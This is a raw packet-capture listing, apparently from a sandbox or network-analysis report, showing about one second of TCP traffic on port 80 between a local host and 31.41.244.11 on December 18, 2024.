                                                                                                                                                                  Dec 18, 2024 11:09:28.746737003 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.747682095 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.747694969 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.747740030 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.747946978 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.748761892 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.748841047 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.749037981 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.749181986 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.750145912 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.750164986 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.750210047 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.750210047 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.751641035 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.751653910 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.752098083 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.753526926 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.753542900 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.753554106 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.753566027 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.753612995 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.753612995 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.754661083 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.754676104 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.754739046 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.754739046 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.755127907 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.755141020 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.755172014 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.755207062 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.756318092 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.756330013 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.756359100 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.756411076 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.757416964 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.757476091 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.757641077 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.757683992 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.759371996 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.759383917 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.759422064 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.759439945 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.760581970 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.760593891 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.760624886 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.760659933 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.761769056 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.761811972 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.761898994 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.761948109 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.762962103 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.763051033 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.763070107 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.763111115 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.763911963 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.763923883 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.763972998 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.764003992 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.764648914 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.764661074 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.764712095 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.764712095 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.765244007 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.765391111 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.765419006 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.765510082 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.766037941 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.766050100 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.766093969 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.766938925 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.766978979 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.766983032 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.767163038 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.767884016 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.767986059 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.768033981 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.768079042 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.768837929 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.768910885 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.768974066 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.769037962 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.769929886 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.769968987 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.769987106 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.770028114 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.770435095 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.770530939 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.908843994 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.908974886 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.908984900 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.909130096 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.909658909 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.909694910 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.909718037 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.910151005 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.910924911 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.910959005 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.910983086 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.911005020 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.911607027 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.911700010 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.911721945 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.911806107 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.912628889 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.912688971 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.912800074 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.912972927 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.913465977 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.913501978 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.913546085 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.913546085 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.914319992 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.914371014 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.914417028 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.914417028 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.915441990 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.915491104 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.915535927 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.915535927 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.916153908 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.916208029 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.916492939 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.916546106 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.917107105 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.917249918 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.917327881 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.917377949 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.919146061 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.919195890 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.919203997 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.919231892 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.919276953 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.919276953 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.919399977 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.919445992 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.921133041 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.921166897 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.921205997 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.921212912 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.921212912 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.921255112 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.922152996 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.922188044 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.922208071 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.922221899 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.922261953 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.922261953 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.923398018 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.923434019 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.923471928 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.923471928 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.924717903 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.924751997 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.924762964 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.924788952 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.926126003 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.926158905 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.926181078 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.926213026 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.926258087 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.926258087 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.926543951 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.927351952 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.927443027 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.927481890 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.927529097 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.927529097 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.928019047 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.928052902 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.928085089 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.928085089 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.929578066 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.929610968 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.929625034 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.930906057 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.930929899 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.930938959 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.930974960 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.930975914 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.930975914 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.931016922 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.931251049 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.931350946 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.932360888 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.932394981 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.932406902 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.933803082 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.933829069 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.933836937 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.933871984 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.933873892 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.933873892 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.934423923 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.934464931 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.934530973 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.935422897 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.935456991 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.935484886 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.935570955 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.935977936 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.936012983 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.936023951 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.936806917 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.937767982 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.937808037 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.937823057 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.937839985 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.937839985 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.938491106 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.938518047 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.938572884 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.939363003 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.939373970 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.939409971 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.940706968 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.940717936 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.940726995 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.940736055 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.940783978 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.940783978 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.941540003 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.942720890 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.942732096 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.942742109 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.942742109 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.942791939 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.942791939 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.943274975 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.943334103 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.944087982 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.944099903 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.944144011 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.944144011 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.945631981 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.945642948 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.945653915 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.945678949 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.946847916 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.946857929 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.946867943 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.946897984 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.946898937 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.947340965 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.948594093 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.948613882 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.948625088 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.948640108 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.948731899 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.949791908 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.949803114 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.949814081 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.949839115 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.949867010 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.950520039 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.950558901 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.951365948 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.951409101 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.951703072 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.951714039 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.951787949 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.952940941 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.952951908 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.952989101 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.953545094 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.953556061 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.953979015 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.954648018 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.954659939 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.954706907 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.956384897 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.956396103 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.956407070 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.956429958 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.957461119 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.957470894 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.957479000 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.957482100 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.957529068 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.957529068 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.959347963 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.959361076 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.959371090 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.959394932 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.959485054 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.959516048 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.959557056 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:28.962526083 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:28.962826967 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.100559950 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.100577116 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.100588083 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.100671053 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.101633072 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.101644993 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.101655960 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.101705074 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.101705074 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.103486061 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.103497028 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.103507042 CET804991231.41.244.11192.168.2.6
